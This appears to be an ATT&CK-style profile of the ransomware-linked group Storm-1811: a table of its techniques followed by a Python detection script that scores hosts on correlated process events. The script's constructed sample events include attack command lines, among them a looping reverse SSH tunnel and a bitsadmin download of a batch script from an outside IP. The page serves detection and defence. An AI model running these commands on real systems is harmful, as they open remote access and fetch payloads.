G1046 Storm-1811
Storm-1811 is a financially motivated entity linked to Black Basta ransomware deployment. Storm-1811 is notable for its unusual phishing and social engineering mechanisms for initial access, such as flooding victim email inboxes with non-malicious spam to prompt a fake "help desk" interaction that leads to the deployment of adversary tools and capabilities.[1][4][2][3]
| Item | Value |
|---|---|
| ID | G1046 |
| Associated Names | |
| Version | 1.0 |
| Created | 14 March 2025 |
| Last Modified | 14 March 2025 |
Techniques Used
| Domain | ID | Name | Use |
|---|---|---|---|
| enterprise | T1087 | Account Discovery | - |
| enterprise | T1087.002 | Domain Account | Storm-1811 has performed domain account enumeration during intrusions.[1] |
| enterprise | T1583 | Acquire Infrastructure | - |
| enterprise | T1583.001 | Domains | Storm-1811 has created domains for use with RMM tools.[4] |
| enterprise | T1547 | Boot or Logon Autostart Execution | - |
| enterprise | T1547.001 | Registry Run Keys / Startup Folder | Storm-1811 has created Windows Registry Run keys that execute various batch scripts to establish persistence on victim devices.[4] |
| enterprise | T1059 | Command and Scripting Interpreter | - |
| enterprise | T1059.001 | PowerShell | Storm-1811 has used PowerShell for multiple purposes, including a PowerShell script that runs in an infinite loop to (re)establish an SSH connection to a command and control server.[4] |
| enterprise | T1059.003 | Windows Command Shell | Storm-1811 has used multiple batch scripts during initial access and subsequent actions on victim machines.[1][4] |
| enterprise | T1486 | Data Encrypted for Impact | Storm-1811 is a financially motivated entity linked to the deployment of Black Basta ransomware in victim environments.[1] |
| enterprise | T1074 | Data Staged | - |
| enterprise | T1074.001 | Local Data Staging | Storm-1811 has locally staged captured credentials for subsequent manual exfiltration.[4] |
| enterprise | T1140 | Deobfuscate/Decode Files or Information | Storm-1811 has distributed password-protected archives, such as ZIP files, during intrusions.[4] |
| enterprise | T1482 | Domain Trust Discovery | Storm-1811 has enumerated domain accounts and access during intrusions.[1] |
| enterprise | T1667 | Email Bombing | Storm-1811 has sent large volumes of non-malicious email spam to victims in order to prompt follow-on interactions, with the threat actor posing as IT support or the helpdesk offering to resolve the problem.[4][2] |
| enterprise | T1585 | Establish Accounts | - |
| enterprise | T1585.003 | Cloud Accounts | Storm-1811 has created malicious accounts to enable activity via Microsoft Teams, typically spoofing various IT support and helpdesk themes.[1] |
| enterprise | T1048 | Exfiltration Over Alternative Protocol | - |
| enterprise | T1048.002 | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Storm-1811 has exfiltrated captured user credentials via Secure Copy Protocol (SCP).[4] |
| enterprise | T1222 | File and Directory Permissions Modification | - |
| enterprise | T1222.001 | Windows File and Directory Permissions Modification | Storm-1811 has used cacls.exe via batch script to modify file and directory permissions in victim environments.[4] |
| enterprise | T1574 | Hijack Execution Flow | - |
| enterprise | T1574.001 | DLL | Storm-1811 has deployed a malicious DLL (7z.DLL) that is sideloaded by a modified, legitimate 7-Zip installer (7zG.exe) when that installer is executed with the additional command-line argument `b`, loading a Cobalt Strike Beacon payload.[4] |
| enterprise | T1656 | Impersonation | Storm-1811 impersonates help desk and IT support personnel for phishing and social engineering purposes during initial access to victim environments.[1] |
| enterprise | T1105 | Ingress Tool Transfer | Storm-1811 has used scripted cURL commands, BITSAdmin, and other mechanisms to retrieve follow-on batch scripts and tools for execution on victim devices.[1][4][3] |
| enterprise | T1056 | Input Capture | Storm-1811 has used a PowerShell script to capture user credentials after prompting the user to authenticate in order to run a malicious script masquerading as a legitimate update.[4] |
| enterprise | T1570 | Lateral Tool Transfer | Storm-1811 has used the Impacket toolset to move payloads to other hosts in victim networks and execute them remotely.[4] |
| enterprise | T1036 | Masquerading | Storm-1811 has prompted users to download and execute batch scripts that masquerade as legitimate update files during initial access and social engineering operations.[4] |
| enterprise | T1036.005 | Match Legitimate Resource Name or Location | Storm-1811 has disguised a Cobalt Strike installer as a malicious DLL that masquerades as part of a legitimate 7-Zip installation package.[4] |
| enterprise | T1036.010 | Masquerade Account Name | Storm-1811 has created Microsoft Teams accounts that spoof IT support and helpdesk members for use in application and voice phishing.[1] |
| enterprise | T1027 | Obfuscated Files or Information | - |
| enterprise | T1027.013 | Encrypted/Encoded File | Storm-1811 has XOR-encoded a Cobalt Strike installation payload inside a DLL file; the payload is decoded with a hardcoded key when the DLL is loaded by a legitimate 7-Zip process.[4] |
| enterprise | T1588 | Obtain Capabilities | - |
| enterprise | T1588.002 | Tool | Storm-1811 has acquired various legitimate and malicious tools, such as RMM software and commodity malware packages, for operations.[1][4] |
| enterprise | T1566 | Phishing | - |
| enterprise | T1566.002 | Spearphishing Link | Storm-1811 has distributed malicious links to victims that redirect to EvilProxy-based phishing sites to harvest credentials.[1] |
| enterprise | T1566.003 | Spearphishing via Service | Storm-1811 has used Microsoft Teams to send messages and initiate voice calls to victims while posing as IT support personnel.[1] |
| enterprise | T1566.004 | Spearphishing Voice | Storm-1811 has initiated voice calls with victims while posing as IT support to prompt users to download and execute scripts and other tools for initial access.[1][4][2] |
| enterprise | T1219 | Remote Access Tools | - |
| enterprise | T1219.002 | Remote Desktop Software | Storm-1811 has abused multiple types of legitimate remote access software and tools, such as ScreenConnect, NetSupport Manager, and AnyDesk.[1][4] |
| enterprise | T1021 | Remote Services | - |
| enterprise | T1021.002 | SMB/Windows Admin Shares | Storm-1811 has attempted to move laterally in victim environments via SMB using Impacket.[4] |
| enterprise | T1021.004 | SSH | Storm-1811 has used OpenSSH to establish an SSH tunnel to victims for persistent access.[1] |
| enterprise | T1033 | System Owner/User Discovery | Storm-1811 has used whoami.exe to determine whether the active user on a compromised system is an administrator.[4] |
| enterprise | T1204 | User Execution | - |
| enterprise | T1204.002 | Malicious File | Storm-1811 has prompted users to execute downloaded software and payloads as the result of social engineering activity.[1][4][2] |
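The table above lists the host-side behaviours individually; a hunter usually wants them correlated, because a lone `whoami.exe` or `cacls.exe` from a batch script is noise while the same host also launching `7zG.exe b`, a looping PowerShell SSH client and a BITSAdmin script download is not. The script below is an added example, not code from the ATT&CK page or from any of the cited reports: it turns several of the tabled behaviours into simple rules over process-creation records and only flags a host when several distinct rules fire. The sample events are constructed to resemble Sysmon Event ID 1 / EDR process records; hostnames, paths, usernames, IP addresses and the rule thresholds are assumptions.

```python
"""Hunt for Storm-1811-style host activity in process-creation telemetry.

Added example (not code from the ATT&CK page or the cited reports). The
events below are constructed; hostnames, paths, users and IPs are assumed.
"""
import re
from collections import defaultdict
from ntpath import basename

# Remote-access tools the page lists as abused, plus Quick Assist (ref 1).
RMM_PARENTS = {
    "screenconnect.clientservice.exe", "screenconnect.windowsclient.exe",
    "client32.exe",            # NetSupport Manager client
    "anydesk.exe", "quickassist.exe",
}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Constructed sample events: WS01 shows the chain described on the page,
# WS02 shows benign look-alikes that a single rule would over-flag.
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Users\alice\Downloads\7zG.exe",
     "cmdline": r'"C:\Users\alice\Downloads\7zG.exe" b',
     "parent": r"C:\Windows\explorer.exe"},
    {"host": "WS01", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c update.bat",
     "parent": r"C:\Program Files\ScreenConnect Client\ScreenConnect.ClientService.exe"},
    {"host": "WS01", "image": r"C:\Windows\System32\whoami.exe",
     "cmdline": "whoami /groups", "parent": r"C:\Windows\System32\cmd.exe"},
    {"host": "WS01", "image": r"C:\Windows\System32\cacls.exe",
     "cmdline": r"cacls C:\ProgramData\tmp /e /g Everyone:F",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"host": "WS01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -ep bypass -c "while($true){ssh -N -R 2222:127.0.0.1:3389 ops@198.51.100.7; Start-Sleep 30}"',
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"host": "WS01", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job /download /priority high http://198.51.100.7/stage2.bat C:\ProgramData\stage2.bat",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"host": "WS02", "image": r"C:\Program Files\7-Zip\7zG.exe",
     "cmdline": r'"C:\Program Files\7-Zip\7zG.exe" a archive.7z docs',
     "parent": r"C:\Windows\explorer.exe"},
    {"host": "WS02", "image": r"C:\Windows\System32\whoami.exe",
     "cmdline": "whoami", "parent": r"C:\Windows\System32\cmd.exe"},
]


def _base(path):
    return basename(path).lower()


def rule_7zg_sideload_trigger(ev):
    """7zG.exe run with the lone argument 'b' (the 7z.DLL sideload trigger);
    normal 7zG.exe use carries an operation letter plus archive paths."""
    return (_base(ev["image"]) == "7zg.exe"
            and re.search(r'(?i)7zg\.exe"?\s+b\s*$', ev["cmdline"]) is not None)


def rule_whoami_from_script(ev):
    """whoami.exe spawned by a script host (admin check from a batch file).
    Weak on its own; useful only in combination with other rules."""
    return _base(ev["image"]) == "whoami.exe" and _base(ev["parent"]) in SCRIPT_HOSTS


def rule_cacls_from_script(ev):
    """cacls.exe spawned by a script host (permission changes via batch)."""
    return _base(ev["image"]) == "cacls.exe" and _base(ev["parent"]) in SCRIPT_HOSTS


def rule_powershell_ssh_loop(ev):
    """PowerShell command line that loops around an ssh client invocation."""
    cl = ev["cmdline"].lower()
    return (_base(ev["image"]) in {"powershell.exe", "pwsh.exe"}
            and re.search(r"\bssh(\.exe)?\b", cl) is not None
            and ("while" in cl or "for(;;)" in cl))


def rule_script_download(ev):
    """bitsadmin/curl pulling a script or binary over HTTP(S)."""
    cl = ev["cmdline"].lower()
    return (_base(ev["image"]) in {"bitsadmin.exe", "curl.exe"}
            and "http" in cl
            and re.search(r"\.(bat|cmd|ps1|exe|dll|zip)\b", cl) is not None)


def rule_script_host_from_rmm(ev):
    """cmd/PowerShell started directly under a remote-access tool's process."""
    return _base(ev["parent"]) in RMM_PARENTS and _base(ev["image"]) in SCRIPT_HOSTS


RULES = {fn.__name__: fn for fn in (
    rule_7zg_sideload_trigger, rule_whoami_from_script, rule_cacls_from_script,
    rule_powershell_ssh_loop, rule_script_download, rule_script_host_from_rmm)}


def hunt(events):
    """Return (host, rule, cmdline) for every event/rule match."""
    return [(ev["host"], name, ev["cmdline"])
            for ev in events for name, fn in RULES.items() if fn(ev)]


def suspicious_hosts(events, min_distinct_rules=3):
    """Hosts on which at least min_distinct_rules different rules fired.
    Correlating across rules keeps the weak whoami/cacls signals useful
    without paging on every administrative batch script."""
    per_host = defaultdict(set)
    for host, rule, _ in hunt(events):
        per_host[host].add(rule)
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= min_distinct_rules}


if __name__ == "__main__":
    for host, rules in suspicious_hosts(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(rules))
```

Run stand-alone it reports WS01 with six distinct rules and stays silent on WS02, whose benign 7zG.exe archive creation and bare `whoami` trip at most one rule. The threshold of three distinct rules is a starting point, not a tuned value; in a real deployment the 7zG `b` trigger and the PowerShell SSH loop deserve to alert on their own, while the whoami and cacls rules should only ever contribute to the host score.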
Software
References
- [1] Microsoft Threat Intelligence. (2024, May 15). Threat actors misusing Quick Assist in social engineering attacks leading to ransomware. Retrieved March 14, 2025.
- [2] Red Canary Intelligence. (2024, December 2). Storm-1811 exploits RMM tools to drop Black Basta ransomware. Retrieved March 14, 2025.
- [3] The Red Canary Team. (2024, June 20). Intelligence Insights: June 2024. Retrieved March 14, 2025.
- [4] Tyler McGraw, Thomas Elkins, and Evan McCann. (2024, May 10). Ongoing Social Engineering Campaign Linked to Black Basta Ransomware Operators. Retrieved January 31, 2025.